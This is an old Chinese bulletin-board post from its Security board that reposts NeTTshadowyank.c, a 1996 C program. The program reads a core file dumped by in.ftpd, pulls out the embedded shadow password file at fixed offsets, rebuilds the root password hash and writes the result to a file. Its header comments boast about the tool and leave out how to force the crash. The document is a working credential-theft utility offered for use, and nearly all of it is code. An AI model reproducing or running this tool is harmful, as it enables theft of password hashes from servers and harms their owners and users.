core dump by ftp.txt

当今

发信人: biff (大可), 信区: Security 
标  题: core dump by ftp 
发信站: 武汉白云黄鹤站 (Sun Jun 13 14:58:25 1999), 站内信件 
  
/* NeTTshadowyank.c, by NeTTwerk (nettwerk@spyder.org) 
   Oct 17, 1996 
   Released into the Public Domain (not for use with some sets) 
                              **NeTTshadowyank** 
                                 Version 1.0 
                              nettwerk@spyder.org 
  
  NeTTshadowyank is a simple utility which reads a corefile created by 
in.ftpd, and pulls out the shadow file 8).. it also reconstructs the root 
password (which is corrupted in the shadow entry buffer), and puts it 
in the appropriate place in the targetfile 'NeTTshadowyank.shadow'. 
  
  This is a really brainless program from the perspective that it does 
very *little* inteligence... Version 2.0, will have my infamous 
'heuristics engine' which will *look* for shadow entries/passwd entries 
in the binary file. 
  
  (btw: if you dont know *how* to make in.ftpd dump core with the shadow 
file inside it, tough luck) 
  
  Greets for this little util go out for BioH,mudge,glyph (all the l0pht guys), 
bika,k,rommel,hobbit and of course,whoever wrote in.ftpd ;) 
  
latah. 
  
questions can be sent to nettwerk@spyder.org 
*/ 
  
#include <stdio.h> 
#include <stdlib.h> 
#include <sys/types.h> 
#include <malloc.h> 
#include <unistd.h> 
#include <sys/elftypes.h> 
#include <elf.h> 
#include <fcntl.h> 
#include <sys/stat.h> 
  
#define ROOT_OFFSET 0xd7d4 
#define SHADOW_OFFSET 0xfadb 
void main(argc,argv) 
int argc; 
char **argv; 
{ 
        FILE *fp; 
        FILE *fp2; 
        char SZ_line[255]; 
        Elf32_Ehdr *Telf32_hdr; 
        int I_fd; 
        void *Vp_buff; 
        struct stat Sstat_buf; 
        char *Cp_ptr; 
  
        if (argc!=2) 
                { 
                printf("[NeTTshadowyank] Usage: %s corefilename\n",argv[0]); 
                exit(0); 
                } 
        if ((I_fd=open(argv[1],O_RDONLY))<0) 
                { 
                perror("Opening Corefile"); 
                exit(0); 
                } 
        if (fstat(I_fd,&Sstat_buf)<0) 
                { 
                perror("fstat()'ing file"); 
                exit(0); 
                } 
        printf("[NeTTshadowyank] Loading %s, size %d 
bytes\n",argv[1],Sstat_buf.st_size); 
        if (!(Vp_buff=malloc(Sstat_buf.st_size))) 
                { 
                printf("Out of Memory\n"); 
                exit(0); 
                } 
        memset(Vp_buff,0,Sstat_buf.st_size); 
        if (read(I_fd,(char *)Vp_buff,Sstat_buf.st_size)<0) 
                { 
                perror("Reading corefile"); 
                exit(0); 
                } 
        Telf32_hdr = (Elf32_Ehdr *)Vp_buff; 
        printf("File Type ->%c%c%c%c\n",Telf32_hdr->e_ident[EI_MAG0] 
  
                                                     ,Telf32_hdr->e_ident[EI 
_MAG1] 
  
                                                     ,Telf32_hdr->e_ident[EI 
_MAG2] 
  
                                                     ,Telf32_hdr->e_ident[EI 
_MAG3]); 
  
        printf("File Class->0x%x",Telf32_hdr->e_ident[EI_CLASS]); 
  
        if (Telf32_hdr->e_ident[EI_CLASS]==1) 
                printf(" (32 Bit Binary)\n"); 
        else if (Telf32_hdr->e_ident[EI_CLASS]==2) 
                printf(" (64 Bit Binary)\n"); 
        else 
                printf(" (BAD Binary)\n"); 
  
        printf("File Data ->0x%x",Telf32_hdr->e_ident[EI_DATA]); 
  
  if (Telf32_hdr->e_ident[EI_DATA]==1) 
    printf(" (Least Significant Bit)\n"); 
  else if (Telf32_hdr->e_ident[EI_DATA]==2) 
    printf(" (Most Significant Bit)\n"); 
  else 
    printf(" (BAD Binary)\n"); 
  
        printf("File Vers ->0x%x\n",Telf32_hdr->e_ident[EI_VERSION]); 
        printf("File Type ->0x%x",Telf32_hdr->e_type); 
        if (Telf32_hdr->e_type==1) 
                printf(" (Relocatable Executable)\n"); 
        else if (Telf32_hdr->e_type==2) 
                printf(" (EXEC Executable)\n"); 
        else if (Telf32_hdr->e_type==3) 
                printf(" (Dynamic Executable)\n"); 
        else if (Telf32_hdr->e_type==4) 
                printf(" (Core Dump [Post-Mortem])\n"); 
        else if (Telf32_hdr->e_type==5) 
                printf(" (Numeric Executable)\n"); 
        else 
                printf(" (Unknown Binary Format)\n"); 
  
        Cp_ptr=Vp_buff+ROOT_OFFSET; 
        printf("Root Password location (%s) ->%s\n",ROOT_OFFSET,Cp_ptr); 
  
        printf("Reconstructing shadow file\n"); 
        if (!(fp=fopen("NeTTshadowyank.scratch","w"))) 
                { 
                perror("Creating scratch file"); 
                exit(0); 
                } 
        Cp_ptr=Vp_buff+SHADOW_OFFSET; 
        while(1) 
                { 
                if (!strncmp(Cp_ptr,"lic_key",7)) 
                        break; 
                if (*Cp_ptr=='#') 
                        break; 
                if (*Cp_ptr==0) 
                        fprintf(fp," "); 
                else 
                        fprintf(fp,"%c",*Cp_ptr); 
                Cp_ptr++; 
                } 
        fclose(fp); 
        if (!(fp=fopen("NeTTshadowyank.scratch","r"))) 
    { 
    perror("Opening Scratch File"); 
    exit(0); 
    } 
  if (!(fp2=fopen("NeTTshadowyank.shadow","w"))) 
    { 
    perror("Creating target file"); 
    exit(0); 
    } 
  while(fgets(SZ_line,sizeof(SZ_line),fp)) 
                { 
                SZ_line[(strlen(SZ_line)-1)]=0; 
                if (!strncmp(SZ_line,"root",4)) 
                        { 
                        Cp_ptr=Vp_buff+ROOT_OFFSET; 
                        printf("[NeTTshadowyank] Repairing Root Shadow 
Entry\n"); 
                        fprintf(fp2,"root:%s:0::::::\n",Cp_ptr); 
                        } 
                else 
                        fprintf(fp2,"%s\n",SZ_line); 
                } 

} 
  
  
  
--